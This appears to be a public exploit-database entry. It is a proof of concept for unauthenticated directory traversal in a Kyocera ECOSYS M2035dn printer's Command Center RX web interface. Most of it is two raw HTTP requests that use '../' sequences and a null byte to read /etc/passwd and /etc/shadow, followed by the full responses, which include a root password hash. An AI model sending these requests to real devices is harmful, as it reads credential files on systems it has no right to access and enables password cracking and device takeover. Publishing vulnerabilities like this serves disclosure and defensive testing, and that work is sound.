07b4b32301
4 changes to exploits/shellcodes Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated) Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated) Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)
104 lines
No EOL
2.8 KiB
Text
104 lines
No EOL
2.8 KiB
Text
# Exploit Title: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated)
|
|
# Author: Luis Martinez
|
|
# Discovery Date: 2022-02-10
|
|
# Vendor Homepage: https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html
|
|
# Tested Version: ECOSYS M2035dn
|
|
# Tested on: Linux
|
|
# Vulnerability Type: Directory Traversal File Disclosure (Unauthenticated)
|
|
|
|
# Proof of Concept:
|
|
# 1.- Create a directory traversal payload
|
|
# 2.- Add nullbyte to the end of the payload(%00)
|
|
# 3.- Sent your request
|
|
|
|
Request 1:
|
|
|
|
GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1
|
|
Cookie: rtl=0
|
|
Host: X.X.X.X
|
|
Connection: Keep-alive
|
|
Accept-Encoding: gzip,deflate
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
|
|
Accept: */*
|
|
|
|
Response 1:
|
|
|
|
HTTP/1.1 200 OK
|
|
Content-Length: 844
|
|
Upgrade: TLS/1.0
|
|
Accept-Encoding: identity
|
|
Date: Thu, 10 Feb 2022 15:55:57 GMT
|
|
Server: KM-MFP-http/V0.0.1
|
|
Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT
|
|
ETag: "/js/../../../../../../../../etc/passwd, Thu, 10 Feb 2022 15:25:48 GMT"
|
|
Content-Type: image/jpeg
|
|
|
|
root:x:0:0:root:/root:/bin/sh
|
|
bin:x:1:1:bin:/bin:/bin/sh
|
|
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
|
|
sys:x:3:3:sys:/dev:/bin/sh
|
|
adm:x:4:4:adm:/var/adm:/bin/sh
|
|
lp:x:5:7:lp:/var/spool/lpd:/bin/sh
|
|
sync:x:6:8:sync:/bin:/bin/sync
|
|
shutdown:x:7:9:shutdown:/sbin:/sbin/shutdown
|
|
halt:x:8:10:halt:/sbin:/sbin/halt
|
|
mail:x:9:11:mail:/var/mail:/bin/sh
|
|
news:x:10:12:news:/var/spool/news:/bin/sh
|
|
uucp:x:11:13:uucp:/var/spool/uucp:/bin/sh
|
|
operator:x:12:0:operator:/root:/bin/sh
|
|
games:x:13:60:games:/usr/games:/bin/sh
|
|
ftp:x:15:14:ftp:/var/ftp:/bin/sh
|
|
man:x:16:20:man:/var/cache/man:/bin/sh
|
|
www:x:17:18:www-data:/var/www:/bin/sh
|
|
sshd:x:18:19:sshd:/var/run/sshd:/bin/sh
|
|
proxy:x:19:21:proxy:/bin:/bin/sh
|
|
telnetd:x:20:22:proxy:/bin:/bin/sh
|
|
backup:x:34:34:backup:/var/backups:/bin/sh
|
|
ais:x:101:101:ais:/var/run/ais:/bin/sh
|
|
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
|
|
|
|
Request 2:
|
|
|
|
GET /js/../../../../../../../../etc/shadow%00.jpg HTTP/1.1
|
|
Cookie: rtl=0
|
|
Host: X.X.X.X
|
|
Connection: Keep-alive
|
|
Accept-Encoding: gzip,deflate
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
|
|
Accept: */*
|
|
|
|
Response 2:
|
|
|
|
HTTP/1.1 200 OK
|
|
Content-Length: 480
|
|
Upgrade: TLS/1.0
|
|
Accept-Encoding: identity
|
|
Date: Thu, 10 Feb 2022 16:10:16 GMT
|
|
Server: KM-MFP-http/V0.0.1
|
|
Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT
|
|
ETag: "/js/../../../../../../../../etc/shadow, Thu, 10 Feb 2022 15:25:48 GMT"
|
|
Content-Type: image/jpeg
|
|
|
|
root:$1$7NzW9Q4N$hXTtMygKjVUdJtW86EH3t1:15873::::::
|
|
bin:*:15873::::::
|
|
daemon:*:15873::::::
|
|
sys:*:15873::::::
|
|
adm:*:15873::::::
|
|
lp:*:15873::::::
|
|
sync:*:15873::::::
|
|
shutdown:*:15873::::::
|
|
halt:*:15873::::::
|
|
mail:*:15873::::::
|
|
news:*:15873::::::
|
|
uucp:*:15873::::::
|
|
operator:*:15873::::::
|
|
games:*:15873::::::
|
|
ftp:*:15873::::::
|
|
man:*:15873::::::
|
|
www:*:15873::::::
|
|
sshd:*:15873::::::
|
|
proxy:*:15873::::::
|
|
telnetd:*:15873::::::
|
|
backup:*:15873::::::
|
|
ais:*:15873::::::
|
|
nobody:*:15873:::::: |